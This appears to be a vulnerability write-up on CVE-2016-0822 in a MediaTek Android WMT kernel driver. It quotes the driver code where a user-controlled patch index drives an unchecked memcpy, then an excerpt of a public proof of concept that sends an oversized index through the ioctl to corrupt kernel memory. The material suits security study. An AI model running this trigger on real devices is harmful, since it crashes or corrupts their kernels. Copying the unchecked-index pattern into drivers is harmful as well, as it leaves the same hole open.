
    • CVE-2016-0822-MTK-drivers/misc/mediatek/connectivity/common/combo/linux/wmt_dev.c#1158
    //mediatek/kernel/drivers/combo/common/core/include/wmt_lib.h
    /*
     * Patch descriptor handed to the kernel through the
     * WMT_IOCTL_SET_PATCH_INFO ioctl. It is filled in by copy_from_user(),
     * so every field is caller-controlled until the handler validates it.
     */
    typedef struct {
            UINT32 dowloadSeq;      /* 1-based slot index: the handler computes
                                     * "pPatchInfo + dowloadSeq - 1" from it with no
                                     * visible range check (CVE-2016-0822) */
            UCHAR addRess[4];       /* raw 4-byte field; meaning not shown here */
            UCHAR patchName[256];   /* NOTE(review): copied as raw bytes, so NUL
                                     * termination is not guaranteed -- verify before
                                     * using it as a C string */
    }WMT_PATCH_INFO,*P_WMT_PATCH_INFO;
    
    /*
     * Record the number of patch entries in the global WMT device state.
     *
     * @num: patch count supplied by the caller. It is stored verbatim in
     *       gDevWmt.patchNum; no range check is performed here.
     *       NOTE(review): presumably this count is what bounds the patch-info
     *       array that WMT_IOCTL_SET_PATCH_INFO indexes -- confirm against
     *       the allocation site.
     */
    VOID wmt_lib_set_patch_num(unsigned long num)
    {
            gDevWmt.patchNum = num;
    }
          
      ret = ioctl(fd, WMT_IOCTL_SET_PATCH_INFO, &overflow);
      case WMT_IOCTL_SET_PATCH_INFO:{
          ...
          if (copy_from_user(&wMtPatchInfo, (void *)arg, sizeof(WMT_PATCH_INFO))) {
                                    WMT_ERR_FUNC("copy_from_user failed at %d
    ", __LINE__);
                                    iRet = -EFAULT;
                                    break;
                            }
          ...
          dWloadSeq = wMtPatchInfo.dowloadSeq; 
          //arbitrary memory overwrite. user can control dowloadSeq
          osal_memcpy(pPatchInfo + dWloadSeq - 1, &wMtPatchInfo,
                                        sizeof(WMT_PATCH_INFO));
    

    CVE-2016-0822 PoC:

    https://github.com/ScottyBauer/Android_Kernel_CVE_POCs/blob/master/CVE-2016-0822-mtk.c

            /* set some absurd offset, in hopes of causing panic or GPF */
            overflow.dowloadSeq = 0x31337;
            /* set obvious bogus data into data fields.
             * If I had exploitation skills these would contain pointers to userland!
             */
            memset(&overflow.addRess, 'A', 4);
            memset(&overflow.patchName, 'A', 256);
    
            ret = ioctl(fd, WMT_IOCTL_SET_PATCH_INFO, &overflow);
    